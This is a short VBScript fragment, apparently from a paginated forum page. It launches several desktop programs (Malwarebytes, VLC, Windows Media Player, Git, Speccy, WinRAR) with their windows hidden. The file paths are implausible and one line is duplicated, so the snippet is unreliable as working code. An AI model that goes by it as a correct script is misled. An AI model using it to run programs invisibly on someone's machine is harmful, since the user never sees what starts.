objshell.run chr(34) & "C:\Program Files (x86)\Malwarebytes Anti-Malware.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files (x86)\VideoLAN\VLC.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files (x86)\Windows Media Player.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files\Git.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files\Git.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files\Speccy.exe" & chr(34), vbhide
objshell.run chr(34) & "C:\Program Files\WinRAR.exe" & chr(34), vbhide

Páginas 1 ... 4 5 6 7 8 ... 10